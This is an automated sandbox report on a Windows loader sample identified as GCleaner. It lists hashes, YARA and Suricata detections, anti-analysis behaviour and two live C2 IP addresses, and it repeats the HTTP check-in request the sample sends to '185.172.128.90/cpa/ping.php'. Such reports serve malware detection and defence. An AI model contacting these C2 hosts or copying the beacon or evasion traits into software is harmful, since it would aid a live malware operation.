Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
stage-0.bin.exe

Overview

General Information

Sample name:stage-0.bin.exe
Analysis ID:1551387
MD5:8b7d2590f1fb0dfd81b796f4b4723542
SHA1:b492d614f7749220b934127cdfc737426797890c
SHA256:b0968bdb6a175a38ec05efcf605ed61411d16e63e692bc0d7b8f1f747ce3b2e5
Tags:exeGCleanerpackeruser-plebourhis
Infos:

Detection

GCleaner
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GCleaner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • stage-0.bin.exe (PID: 1484 cmdline: "C:\Users\user\Desktop\stage-0.bin.exe" MD5: 8B7D2590F1FB0DFD81B796F4B4723542)
  • cleanup
{"C2 addresses": ["185.172.128.90", "5.42.65.115"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.3375674668.00000000007BC000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1398:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3375447042.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
    00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
      00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000003.2129643395.0000000000740000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.stage-0.bin.exe.400000.0.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
          0.3.stage-0.bin.exe.740000.0.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
            0.2.stage-0.bin.exe.710e67.1.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
              0.3.stage-0.bin.exe.740000.0.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                0.2.stage-0.bin.exe.710e67.1.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                  Click to see the 1 entries
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T17:35:27.732600+010020229301A Network Trojan was detected4.175.87.197443192.168.2.649758TCP
                  2024-11-07T17:35:55.246016+010020229301A Network Trojan was detected4.175.87.197443192.168.2.653298TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T17:35:05.807851+010028562331A Network Trojan was detected192.168.2.653308185.172.128.9080TCP
                  2024-11-07T17:35:19.807581+010028562331A Network Trojan was detected192.168.2.649709185.172.128.9080TCP
                  2024-11-07T17:35:33.312240+010028562331A Network Trojan was detected192.168.2.649752185.172.128.9080TCP
                  2024-11-07T17:35:46.820698+010028562331A Network Trojan was detected192.168.2.649813185.172.128.9080TCP
                  2024-11-07T17:36:00.443027+010028562331A Network Trojan was detected192.168.2.649828185.172.128.9080TCP
                  2024-11-07T17:36:13.937631+010028562331A Network Trojan was detected192.168.2.653300185.172.128.9080TCP
                  2024-11-07T17:36:27.445639+010028562331A Network Trojan was detected192.168.2.653301185.172.128.9080TCP
                  2024-11-07T17:36:40.958410+010028562331A Network Trojan was detected192.168.2.653304185.172.128.9080TCP
                  2024-11-07T17:36:54.449681+010028562331A Network Trojan was detected192.168.2.653305185.172.128.9080TCP
                  2024-11-07T17:37:07.954255+010028562331A Network Trojan was detected192.168.2.653307185.172.128.9080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: stage-0.bin.exeAvira: detected
                  Source: 0.2.stage-0.bin.exe.400000.0.unpackMalware Configuration Extractor: GCleaner {"C2 addresses": ["185.172.128.90", "5.42.65.115"]}
                  Source: stage-0.bin.exeReversingLabs: Detection: 78%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: stage-0.bin.exeJoe Sandbox ML: detected

                  Compliance

                  barindex
                  Source: C:\Users\user\Desktop\stage-0.bin.exeUnpacked PE file: 0.2.stage-0.bin.exe.400000.0.unpack
                  Source: stage-0.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\stage-0.bin.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: C:\giroza\gok\didamufufenuse-kusoj.pdb source: stage-0.bin.exe
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00415802 FindFirstFileExW,0_2_00415802
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00725A69 FindFirstFileExW,0_2_00725A69

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:49709 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:49752 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:49813 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:49828 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53307 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53300 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53305 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53301 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53304 -> 185.172.128.90:80
                  Source: Network trafficSuricata IDS: 2856233 - Severity 1 - ETPRO MALWARE Win32/Unknown Loader Related Activity (GET) : 192.168.2.6:53308 -> 185.172.128.90:80
                  Source: Malware configuration extractorIPs: 185.172.128.90
                  Source: Malware configuration extractorIPs: 5.42.65.115
                  Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                  Source: Joe Sandbox ViewIP Address: 5.42.65.115 5.42.65.115
                  Source: Joe Sandbox ViewASN Name: NADYMSS-ASRU NADYMSS-ASRU
                  Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:53298
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49758
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=one&s=two HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                  Source: stage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=two
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=two8
                  Source: stage-0.bin.exe, 00000000.00000002.3375693312.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=two;
                  Source: stage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoB
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoD
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, stage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoV
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoZ
                  Source: stage-0.bin.exe, 00000000.00000002.3375693312.000000000085C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoc
                  Source: stage-0.bin.exe, 00000000.00000002.3375693312.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoj
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twol
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twop
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=twoz
                  Source: stage-0.bin.exe, 00000000.00000002.3375980592.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.90/cpa/ping.php?substr=one&s=two~

                  System Summary

                  barindex
                  Source: 00000000.00000002.3375674668.00000000007BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_004046100_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_004098100_2_00409810
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_004181010_2_00418101
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00413C090_2_00413C09
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_004134140_2_00413414
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00421DEE0_2_00421DEE
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007148770_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00719A770_2_00719A77
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007283680_2_00728368
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0072367B0_2_0072367B
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: String function: 00718C77 appears 38 times
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: String function: 00408A10 appears 38 times
                  Source: stage-0.bin.exe, 00000000.00000000.2118666511.0000000000448000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWonder4 vs stage-0.bin.exe
                  Source: stage-0.bin.exeBinary or memory string: OriginalFilenameWonder4 vs stage-0.bin.exe
                  Source: stage-0.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.3375674668.00000000007BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.3375598842.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: stage-0.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/2
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BD3C6 CreateToolhelp32Snapshot,Module32First,0_2_007BD3C6
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: `a}{0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: >p@0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: 6p@0_2_00404610
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: `a}{0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: NOSUB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: 4zB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: yB0_2_00714877
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCommand line argument: lyB0_2_00714877
                  Source: stage-0.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\stage-0.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: stage-0.bin.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\stage-0.bin.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: stage-0.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\giroza\gok\didamufufenuse-kusoj.pdb source: stage-0.bin.exe

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\stage-0.bin.exeUnpacked PE file: 0.2.stage-0.bin.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\Desktop\stage-0.bin.exeUnpacked PE file: 0.2.stage-0.bin.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0040852E push ecx; ret 0_2_00408541
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007241CF push esp; retf 0_2_007241D7
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0072C674 push edi; retf 0_2_0072C678
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_0072C6C5 push es; retf 0_2_0072C6C9
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007247CD push esp; retf 0_2_007247CE
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00718795 push ecx; ret 0_2_007187A8
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007C2160 push ecx; ret 0_2_007C21A8
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BE14E pushad ; retf 0_2_007BE165
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007C2145 push ecx; ret 0_2_007C21A8
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007C21A9 push ecx; ret 0_2_007C21A8
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BFAB8 push 4AE86760h; ret 0_2_007BFABE
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007C03DE push eax; iretd 0_2_007C03E7
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007C043E pushad ; ret 0_2_007C0442
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BF5D5 push 00000000h; ret 0_2_007BF5E3
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_007BF5A8 push ecx; ret 0_2_007BF5A9
                  Source: stage-0.bin.exeStatic PE information: section name: .text entropy: 7.538305971867237

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\stage-0.bin.exeStalling execution: Execution stalls by calling Sleepgraph_0-25746
                  Source: C:\Users\user\Desktop\stage-0.bin.exeAPI coverage: 4.6 %
                  Source: C:\Users\user\Desktop\stage-0.bin.exe TID: 1812Thread sleep time: -45000s >= -30000sJump to behavior
                  Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                  Source: C:\Users\user\Desktop\stage-0.bin.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\stage-0.bin.exeCode function: 0_2_00415802 FindFirstFileExW,0_2_00415802
